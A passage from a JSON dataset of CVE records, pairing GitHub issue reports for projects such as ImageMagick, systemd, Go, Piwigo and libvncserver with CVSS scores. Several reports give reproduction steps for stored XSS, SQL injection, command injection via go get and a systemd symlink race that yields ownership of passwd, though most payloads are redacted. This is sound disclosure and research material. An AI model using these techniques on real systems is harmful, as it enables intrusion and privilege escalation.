NUMBERTAG be in opj_j2k_post_write_tile (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e0 in opj_j2k_encode (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e in opj_encode (p_info NUMBERTAG e NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG f4b6 in main (argc NUMBERTAG arg NUMBERTAG fffffffdcf8) at PATHTAG",
  31833. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31834. "severity": "MEDIUM",
  31835. "baseScore": 5.5,
  31836. "impactScore": 3.6,
  31837. "exploitabilityScore": 1.8
  31838. },
  31839. {
  31840. "CVE_ID": "CVE-2018-6656",
  31841. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/175",
  31842. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/175",
  31843. "Repo_new": "zblogcn/zblogphp",
  31844. "Issue_Created_At": "2018-02-06T03:50:27Z",
  31845. "description": "Z APITAG CSRF \u5220\u9664users\u76ee\u5f55\u53ca\u6587\u4ef6\u9020\u6210\u7f51\u7ad9\u7f3a\u5c11\u6587\u4ef6\u65e0\u6cd5\u6b63\u5e38\u8bbf\u95ee. PATHTAG \u6f0f\u6d1e\u4ee3\u7801\u5904\uff1a if($blogversion NUMBERTAG app=$zbp APITAG $_GET['id']); if($app >type == $_GET['type']){ if($app APITAG $app APITAG } } }else{ function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != '.' && $object != '..') { if (filetype($dir . '/' . $object) == 'dir') { rrmdir($dir . '/' . $object); } else { unlink($dir . '/' . $object); } } } reset($objects); rmdir($dir); } } \u5982\u679c\u6ee1\u8db3\u5224\u65ad\u6761\u4ef6 APITAG \u5220\u9664\u65b9\u6cd5 \u5982\u679c\u4e0d\u6ee1\u8db3\u6267\u884celse\u4e0b\u9762\u5220\u9664\u65b9\u6cd5 APITAG PATHTAG NUMBERTAG public function APITAG { global $zbp; rrmdir($zbp >usersdir . $this >type . '/' . $this >id); $this APITAG } PATHTAG \u6d4b\u8bd5\u8fc7\u7a0b\uff1a APITAG \u6761\u4ef6\uff1a \u9700\u8981\u7ba1\u7406\u5458\u767b\u5f55",
  31846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  31847. "severity": "MEDIUM",
  31848. "baseScore": 6.5,
  31849. "impactScore": 3.6,
  31850. "exploitabilityScore": 2.8
  31851. },
  31852. {
  31853. "CVE_ID": "CVE-2018-6767",
  31854. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/27",
  31855. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/27",
  31856. "Repo_new": "dbry/wavpack",
  31857. "Issue_Created_At": "2018-02-03T12:58:47Z",
  31858. "description": "stack buffer overflow while running wavpack. Forwarding a bug report we received in the Debian bug tracker ( CVETAG stack buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises a stack buffer overflow, which may allow a remote attacker to cause unspecified impact including a denial of service attack. I expected the program to terminate without a segfault, but the program crashes as follows ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav can be downloaded from CVETAG",
  31859. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31860. "severity": "HIGH",
  31861. "baseScore": 7.8,
  31862. "impactScore": 5.9,
  31863. "exploitabilityScore": 1.8
  31864. },
  31865. {
  31866. "CVE_ID": "CVE-2018-6846",
  31867. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/176",
  31868. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/176",
  31869. "Repo_new": "zblogcn/zblogphp",
  31870. "Issue_Created_At": "2018-02-08T09:14:41Z",
  31871. "description": "PATHTAG \u7206\u7269\u7406\u8def\u5f84. PATHTAG Code\uff1a class Upload extends Base { Rows NUMBERTAG Return error \uff1a Fatal error: Class APITAG not found in PATHTAG on line NUMBERTAG Harm\uff1a Web site physical path leakage .",
  31872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  31873. "severity": "MEDIUM",
  31874. "baseScore": 5.3,
  31875. "impactScore": 1.4,
  31876. "exploitabilityScore": 3.9
  31877. },
  31878. {
  31879. "CVE_ID": "CVE-2018-6869",
  31880. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/22",
  31881. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/22",
  31882. "Repo_new": "gdraheim/zziplib",
  31883. "Issue_Created_At": "2018-02-08T17:32:05Z",
  31884. "description": "Uncontrolled memory allocation in __zzip_parse_root_directory ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib, there is an uncontrolled memory allocation and a crash in __zzip_parse_root_directory function of PATHTAG which could be triggered by the POC below. The issue happens since in line NUMBERTAG of PATHTAG file, the request size of malloc (i.e., zz_rootsize) could be manipulated by an input file. Note that this function is in libzzip NUMBERTAG APITAG fd NUMBERTAG struct _disk_trailer trailer NUMBERTAG hdr0 = (struct zzip_dir_hdr ) malloc(zz_rootsize NUMBERTAG To reproduce the issue, run ./zzdir $POC POC: FILETAG back stack NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG b NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG ff NUMBERTAG ba NUMBERTAG ff NUMBERTAG bb NUMBERTAG ff NUMBERTAG bc NUMBERTAG ff NUMBERTAG bd NUMBERTAG ff NUMBERTAG bdb NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff 
NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG eeff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eeff NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f 
NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cd NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG cd NUMBERTAG ff NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ce NUMBERTAG ff NUMBERTAG cf NUMBERTAG ffcd NUMBERTAG ffcd NUMBERTAG a NUMBERTAG stack NUMBERTAG ffcd NUMBERTAG ff NUMBERTAG ffcd NUMBERTAG dso NUMBERTAG ffffffffff NUMBERTAG ffffffffff NUMBERTAG syscall] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG ff NUMBERTAG f5dba NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f5e NUMBERTAG e3 in APITAG const , int, char const , unsigned long long, unsigned long long) APITAG NUMBERTAG ff NUMBERTAG f5e8a NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e0cc APITAG NUMBERTAG ff NUMBERTAG f5d NUMBERTAG e7 in malloc APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG fc3 in __zzip_parse_root_directory PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in __zzip_dir_parse PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in zzip_dir_fdopen_ext_io PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f8b in zzip_opendir_ext_io PATHTAG NUMBERTAG f2e in main PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ec ( PATHTAG )",
  31885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31886. "severity": "MEDIUM",
  31887. "baseScore": 6.5,
  31888. "impactScore": 3.6,
  31889. "exploitabilityScore": 2.8
  31890. },
  31891. {
  31892. "CVE_ID": "CVE-2018-6876",
  31893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/973",
  31894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/973",
  31895. "Repo_new": "imagemagick/imagemagick",
  31896. "Issue_Created_At": "2018-02-07T08:38:19Z",
  31897. "description": "stack buffer underflow. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib libfpx PATHTAG ASAN OUTPUT APITAG > PATHTAG convert FILETAG not_kitty.FPX APITAG NUMBERTAG ERROR: APITAG stack buffer underflow on address NUMBERTAG bfb NUMBERTAG at pc NUMBERTAG aff NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG f8 sp NUMBERTAG bfb NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG bfb NUMBERTAG thread T NUMBERTAG aff NUMBERTAG b7 in APITAG const&) PATHTAG NUMBERTAG afdece4b in APITAG PATHTAG NUMBERTAG afdef6f9 in APITAG PATHTAG NUMBERTAG afdf NUMBERTAG in APITAG char const , APITAG unsigned int) PATHTAG NUMBERTAG afe NUMBERTAG in APITAG int, int, float, APITAG unsigned long, APITAG unsigned char, unsigned char) PATHTAG NUMBERTAG afe3df6c in APITAG unsigned int, unsigned int, unsigned int, unsigned int, APITAG APITAG APITAG APITAG ) PATHTAG NUMBERTAG afe3e NUMBERTAG in APITAG PATHTAG NUMBERTAG b3c6ba NUMBERTAG in APITAG APITAG NUMBERTAG b NUMBERTAG f in APITAG APITAG NUMBERTAG b NUMBERTAG c1f in APITAG APITAG NUMBERTAG b5b NUMBERTAG e4a in APITAG APITAG NUMBERTAG b5d NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG abe in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fb ( PATHTAG ) POC FILETAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: APITAG",
  31898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31899. "severity": "MEDIUM",
  31900. "baseScore": 6.5,
  31901. "impactScore": 3.6,
  31902. "exploitabilityScore": 2.8
  31903. },
  31904. {
  31905. "CVE_ID": "CVE-2018-6883",
  31906. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/839",
  31907. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/839",
  31908. "Repo_new": "piwigo/piwigo",
  31909. "Issue_Created_At": "2018-02-11T09:25:23Z",
  31910. "description": "Piwigo NUMBERTAG SQL injection in administration panel. An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query. This could result in full information disclosure. The SQL injection vulnerability was found in FILETAG and is done by injecting SQL code in the 'tags' POST variable. This variable is only sanitized by APITAG and is not encapsulated by quotes in the concatenated SQL string, allowing the injection to work. Furthermore, the result set is part of the page output, allowing information disclosure about other tables in the database. The POST variables 'edit_list' and 'merge_list' are also vulnerable to this attack; however, no exploit exists to disclose information through these variables. A separate vulnerability report was made for 'edit_list' ( CVETAG , issue NUMBERTAG The security risk of the vulnerabilities is estimated as low with a CVSS score of NUMBERTAG Exploitation of the web vulnerability requires the attacker to be authenticated as administrator. A APITAG can be provided. I'm tracking this under CVETAG",
  31911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  31912. "severity": "MEDIUM",
  31913. "baseScore": 4.9,
  31914. "impactScore": 3.6,
  31915. "exploitabilityScore": 1.2
  31916. },
  31917. {
  31918. "CVE_ID": "CVE-2018-6930",
  31919. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/967",
  31920. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/967",
  31921. "Repo_new": "imagemagick/imagemagick",
  31922. "Issue_Created_At": "2018-01-31T05:55:36Z",
  31923. "description": "Stack over read in APITAG due to type mismatch. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I found that magick reads a buffer over the buffer size at the following line. URLTAG The above line reads APITAG as much as APITAG that is APITAG because APITAG is declared as a double type, on the other hand, the size of APITAG is APITAG because it's a float array. URLTAG I can reproduce this crash only in NUMBERTAG bit machine, I'm not sure why. also, this requires APITAG support. Steps to Reproduce Compile APITAG with address sanitizer in NUMBERTAG bit mode, and use this FILETAG to run magick. this crash is triggered when it's zooming, so I added APITAG option. ERRORTAG System Configuration APITAG version NUMBERTAG bit Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Found by Choongwoo Han and Kyeongseok Yang, Naver Security Team",
  31924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31925. "severity": "MEDIUM",
  31926. "baseScore": 6.5,
  31927. "impactScore": 3.6,
  31928. "exploitabilityScore": 2.8
  31929. },
  31930. {
  31931. "CVE_ID": "CVE-2018-6948",
  31932. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
  31933. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
  31934. "Repo_new": "cn-uofbasel/ccn-lite",
  31935. "Issue_Created_At": "2018-02-13T15:19:56Z",
  31936. "description": "ccnl_prefix_to_str_detailed can overrun when using NFN. The function ccnl_prefix_to_str_detailed can cause a buffer overflow when writing a prefix to the buffer buf. The maximal size of the prefix is CCNL_MAX_PREFIX_SIZE, and the buffer has the size CCNL_MAX_PREFIX_SIZE. However, when NFN is enabled, additional characters are written to the buffer (e.g. the \"NFN\" and the \"R2C\" tags). Therefore, sending an NFN R2C packet with a prefix of size CCNL_MAX_PREFIX_SIZE can cause an overflow of buf inside ccnl_prefix_to_str_detailed.",
  31937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31938. "severity": "CRITICAL",
  31939. "baseScore": 9.8,
  31940. "impactScore": 5.9,
  31941. "exploitabilityScore": 3.9
  31942. },
  31943. {
  31944. "CVE_ID": "CVE-2018-6953",
  31945. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
  31946. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
  31947. "Repo_new": "cn-uofbasel/ccn-lite",
  31948. "Issue_Created_At": "2018-02-13T17:02:29Z",
  31949. "description": "NDNTLV parser accepts Length field of the Name without any checks. The parser of NDNTLV accepts the Length field of the Name without any checks. Therefore, it is possible that the value of the length field of a component of a prefix and the actual size of the component differ. In APITAG : CODETAG This issue can lead to an out-of-bounds memory access when executing ccnl_ndntlv_dehead again. Additionally, in many places CCN lite assumes that the length of the prefix is always correct. If the length does not match the actual component length, buffer overflows or out-of-bounds memory accesses can occur in many places, e.g.: APITAG : buffer overflow, APITAG copies too many bytes if p >complen[i]) > len(prefix >comp[i]), which can lead to a buffer overflow of p >bytes APITAG : out-of-bounds memory access, APITAG APITAG : out-of-bounds memory access, APITAG",
  31950. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31951. "severity": "CRITICAL",
  31952. "baseScore": 9.8,
  31953. "impactScore": 5.9,
  31954. "exploitabilityScore": 3.9
  31955. },
  31956. {
  31957. "CVE_ID": "CVE-2018-6954",
  31958. "Issue_Url_old": "https://github.com/systemd/systemd/issues/7986",
  31959. "Issue_Url_new": "https://github.com/systemd/systemd/issues/7986",
  31960. "Repo_new": "systemd/systemd",
  31961. "Issue_Created_At": "2018-01-24T14:09:49Z",
  31962. "description": "tmpfiles: symlinks are followed in non terminal path components. Sorry to keep harassing you with these. I think APITAG is following symlinks that don't appear as the last path component. In other words, if we are at the point where tmpfiles is about to APITAG , then I can replace the \"foo\" component with a symlink to APITAG , resulting in APITAG and a fairly easy root exploit for any Z type. Same disclaimer: I'm running tmpfiles from a git checkout, but not booting systemd. Now I have APITAG and APITAG . I'm using the same tmpfiles.d entry as before, CODETAG I start the service once, so that APITAG exists: APITAG Now, as the owner (mjo) of APITAG , I can do, in another terminal, APITAG The NUMBERTAG dummy files buy some time to swap in the symlink before the loop gets to passwd . Now, restart the service back in the first terminal... APITAG And while that is busy looping on the NUMBERTAG dummy files, swap out foo with a symlink in the second terminal: APITAG (I've used \"mv\" because \"rm\" is ironically slow at deleting my own dummy files.) The end result is that I wind up as the owner of APITAG , and the APITAG sysctl doesn't protect against this.",
  31963. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31964. "severity": "HIGH",
  31965. "baseScore": 7.8,
  31966. "impactScore": 5.9,
  31967. "exploitabilityScore": 1.8
  31968. },
  31969. {
  31970. "CVE_ID": "CVE-2018-7035",
  31971. "Issue_Url_old": "https://github.com/gleez/cms/issues/794",
  31972. "Issue_Url_new": "https://github.com/gleez/cms/issues/794",
  31973. "Repo_new": "gleez/cms",
  31974. "Issue_Created_At": "2018-02-16T06:48:23Z",
  31975. "description": "Stored XSS via blog. Description: Cross site scripting (XSS) vulnerability in Gleez CMS might allow remote attackers (users) to inject arbitrary web script or HTML via the source editor, which will result in Stored XSS when an Administrator tries to edit the post. Vulnerability Type: Stored XSS Attack Vectors NUMBERTAG Login as user on Gleez CMS NUMBERTAG Click on Blogs > Add Blog NUMBERTAG Change to HTML mode in content bo NUMBERTAG Add XSS Payload : APITAG src=\"x\" APITAG style NUMBERTAG Save the blog NUMBERTAG Login as Administrator NUMBERTAG Goto Blogs NUMBERTAG Open the malicious blog and click on edit NUMBERTAG SS! Attack Impact: This could be used to perform actions against the administrators (or any user editing that post) and could potentially lead to hijacking the user\u2019s session/token. This could happen by users navigating to the attacker\u2019s post on their own, or by the attacker somehow persuading the victim to navigate to the post. Note: It'll not result into XSS in the normal view mode, but when admin or other user will try to edit the post code will be APITAG XSS from User to Admin.]",
  31976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31977. "severity": "MEDIUM",
  31978. "baseScore": 5.4,
  31979. "impactScore": 2.7,
  31980. "exploitabilityScore": 2.3
  31981. },
  31982. {
  31983. "CVE_ID": "CVE-2018-7039",
  31984. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
  31985. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
  31986. "Repo_new": "cn-uofbasel/ccn-lite",
  31987. "Issue_Created_At": "2018-02-13T10:15:53Z",
  31988. "description": "buffer overflow in APITAG Hi, I think that there are multiple issues with various APITAG functions. I've picked the APITAG as an example. The len parameter refers to the size of the blob and offset to the position where the data in blob should be written to buf . The function returns NUMBERTAG if the offset is lower than the size of the blob which is prepended to the buffer (basically if somebody tries to write before the buffer ( buffer underwrite CVETAG . ERRORTAG I've made a short illustration depicting valid input parameters and the result after the memcpy operation. FILETAG Do you agree? Anyway, why are length and offset int parameters? TIA Michael",
  31989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31990. "severity": "CRITICAL",
  31991. "baseScore": 9.8,
  31992. "impactScore": 5.9,
  31993. "exploitabilityScore": 3.9
  31994. },
  31995. {
  31996. "CVE_ID": "CVE-2018-7187",
  31997. "Issue_Url_old": "https://github.com/golang/go/issues/23867",
  31998. "Issue_Url_new": "https://github.com/golang/go/issues/23867",
  31999. "Repo_new": "golang/go",
  32000. "Issue_Created_At": "2018-02-16T01:43:54Z",
  32001. "description": "cmd/go: arbitrary command execution via VCS path. I contacted EMAILTAG rg about this and was allowed to create a public issue. What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? Yes. What did you do? I've noticed that go get is vulnerable to arbitrary command execution via VCS path command injection due to lack of repository URL validation. This command should execute APITAG on the target system: go get insecure APITAG vuln See URLTAG APITAG The proof of concept presented above is targeting Mercurial. What did you expect to see? ERRORTAG What did you see instead? APITAG",
  32002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32003. "severity": "HIGH",
  32004. "baseScore": 8.8,
  32005. "impactScore": 5.9,
  32006. "exploitabilityScore": 2.8
  32007. },
  32008. {
  32009. "CVE_ID": "CVE-2018-7197",
  32010. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/47",
  32011. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/47",
  32012. "Repo_new": "pluck-cms/pluck",
  32013. "Issue_Created_At": "2018-02-17T18:52:49Z",
  32014. "description": "Stored XSS due to Unsantized Url embedding. Hello In addition to the command injection that was mentioned in one of the preceding issues, it's also vulnerable to stored XSS. Reproduction is quite easy NUMBERTAG First install cms, login with administrator to create a blog, create a page and insert blog to it, then logout as admin NUMBERTAG Then we go our blog post and file out the reaction information. We fill in PATHTAG with generic information. For our url we'll provide this string, URLTAG \"> APITAG FILETAG NUMBERTAG Once we submit we'll get met with an alert echo'ing our website's domain name/",
  32015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32016. "severity": "MEDIUM",
  32017. "baseScore": 6.1,
  32018. "impactScore": 2.7,
  32019. "exploitabilityScore": 2.8
  32020. },
  32021. {
  32022. "CVE_ID": "CVE-2018-7225",
  32023. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/218",
  32024. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/218",
  32025. "Repo_new": "libvnc/libvncserver",
  32026. "Issue_Created_At": "2018-02-18T17:30:45Z",
  32027. "description": "Security: libvncserver/rfbserver.c: APITAG case APITAG doesn't sanitize APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. libvncserver/rfbserver.c: APITAG contains the following code: ERRORTAG This passes the client provided NUMBERTAG bit message length field's value directly into APITAG , reads up to this many bytes from the client, and then passes the full value to the library user provided APITAG callback (where the value might be higher than the number of bytes actually read with uninitialized and potentially sensitive data afterwards and it might also be too high for the callback's implementation to handle safely). There may also be integer overflow in the addition of APITAG (which is NUMBERTAG to the value in the call to APITAG ; I did not look into what consequences this might have. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which uses a RHEL7 derived package of APITAG NUMBERTAG from its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG which hardens prl vzvncserver's APITAG callback but the rest of the issue needs to be fixed in libvncserver itself, hence the (belated) report in here. We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) 
This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to 